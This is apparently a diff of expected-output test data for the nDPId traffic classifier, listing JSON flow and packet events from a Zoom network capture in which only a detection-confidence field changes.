+01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470769,"flow_last_seen":1569520470814,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470814,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":192,"source":"zoom.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470742,"flow_last_seen":1569520470820,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470820,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.105","src_port":54867,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam105zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":195,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470755,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":200,"source":"zoom.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470769,"flow_last_seen":1569520470822,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470822,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.85","src_port":54869,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr85zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01021{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":204,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520470776,"flow_last_seen":1569520470828,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520470828,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":209,"source":"zoom.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470755,"flow_last_seen":1569520470829,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470829,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.19.144.104","src_port":54868,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomam104zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +01346{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":212,"source":"zoom.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520470776,"flow_last_seen":1569520470837,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520470837,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"213.244.140.84","src_port":54870,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfr84zc.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":1,"flow_last_seen":1569520471147,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1569520471147,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCtGEAAP8Rg4LAqAF1wKgBAcfxADUALsLBHCQBAAABAAAAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAE="} -00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":257,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471147,"flow_last_seen":1569520471147,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1569520471147,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_packet_id":2,"flow_last_seen":1569520471188,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":96,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":96,"pkt_l4_len":62,"thread_ts_msec":1569520471188,"pkt":"KDc3AG3IEBMx8Tl2CABFAABSclkAADcRjXvAqAEBwKgBdQA1x\/EAPsuKHCSBgAABAAEAAAAADHpvb21mcm45OW1tcgR6b29tAnVzAAABAAHADAABAAEAAKjAAARtXqBj"} -00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}} +00787{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":280,"source":"zoom.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1569520471147,"flow_last_seen":1569520471188,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":54,"flow_tot_l4_payload_len":92,"flow_avg_l4_payload_len":46,"midstream":0,"thread_ts_msec":1569520471188,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"192.168.1.1","src_port":51185,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Zoom","breed":"Acceptable","category":"Video"},"dns": {"query":"zoomfrn99mmr.zoom.us","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"109.94.160.99"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471189,"flow_last_seen":1569520471189,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1569520471189,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":281,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":1,"flow_last_seen":1569520471189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1569520471189,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGatnAqAF1bV6gY9ZXAbsw+fmWAAAAALAC\/\/9csgAAAgQFtAEDAwUBAQgKJZziLAAAAAAEAgAA"} 00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":282,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":2,"flow_last_seen":1569520471220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1569520471220,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8AABAADMGd91tXqBjwKgBdQG71leHhddzMPn5l6ASqbBjhwAAAgQFrAQCCAp2KotLJZziLAEDAww="} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":283,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_packet_id":3,"flow_last_seen":1569520471220,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1569520471220,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGauXAqAF1bV6gY9ZXAbsw+fmXh4XXdIAQECwrtgAAAQEICiWc4kt2KotL"} -00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} +00966{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":284,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1569520471189,"flow_last_seen":1569520471221,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1569520471221,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":286,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1569520471189,"flow_last_seen":1569520471255,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1569520471255,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01347{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":291,"source":"zoom.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1569520471189,"flow_last_seen":1569520471266,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6053,"flow_avg_l4_payload_len":550,"midstream":0,"thread_ts_msec":1569520471266,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":54871,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.Zoom","breed":"Acceptable","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"zoomfrn99mmr.zoom.us","server_names":"*.zoom.us,zoom.us","ja3":"c51de225944b7d58d48c0f99f86ba8e6","ja3s":"ada793d0f02b028a6c840504edccb652","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http:\/\/certs.godaddy.com\/repository\/, CN=Go Daddy Secure Certificate Authority - G2","subjectDN":"OU=Domain Control Validated, CN=*.zoom.us","fingerprint":"F7:5A:83:A8:77:24:55:D7:6D:2E:93:F6:6E:9C:C9:7E:AD:9B:3B:E8"}} 00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":302,"source":"zoom.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1569520471399,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":113,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":113,"pkt_l4_len":79,"thread_ts_msec":1569520471399,"pkt":"EBMx8Tl2KDc3AG3ICABFAABjAABAAEAGoUnAqAF1PpWYmdRFA+E5lpAkp\/QQcoAYEAA2VgAAAQEICiWc4viZh0dJFwMDACpAXTQxH2s8yyXvpDmREm16+\/VcNt\/x\/vlsIce1k7D8R+clMelpc+AJPCA="} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":1,"flow_last_seen":1569520471748,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":149,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":149,"pkt_l4_len":115,"thread_ts_msec":1569520471748,"pkt":"EBMx8Tl2KDc3AG3ICABFAACHYY4AAEARSPnAqAF1bV6gY+PXImEAcwEfAQACfUZNNf\/9ojRJXQ1tO1HolgAAAAAAAAACAHoAKgB6ACoAAABADhc935YCXvuVxCQMI1O\/y\/Bgvpncu9jEece5cy1sdfpDYvCDXrg+TanGp+bzCbMeQN8Pa7V1aoQPcx2bwfanLQAAAAA="} -00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":386,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1569520471748,"flow_last_seen":1569520471748,"flow_idle_time":200000,"flow_min_l4_payload_len":107,"flow_max_l4_payload_len":107,"flow_tot_l4_payload_len":107,"flow_avg_l4_payload_len":107,"midstream":0,"thread_ts_msec":1569520471748,"l3_proto":"ip4","src_ip":"192.168.1.117","dst_ip":"109.94.160.99","src_port":58327,"dst_port":8801,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Zoom","breed":"Acceptable","category":"Video"}} 00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":395,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":2,"flow_last_seen":1569520471780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA\/ukJAADURu4xtXqBjwKgBdSJh49cAK4mJAgABfUZNNf\/9ojRJXQ1tO1HolgBaDj4AegAqAAAAAAAAAAA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":396,"source":"zoom.pcap","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1569520471780,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":21,"thread_ts_msec":1569520471780,"pkt":"KDc3AG3IEBMx8Tl2CABFAAApukNAADURu6FtXqBjwKgBdSJh49cAFe6ZAwAAAAF2Ko10AFoOPgAAAAAA"} 00183{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1569520471784} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":398,"source":"zoom.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1569520471780,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 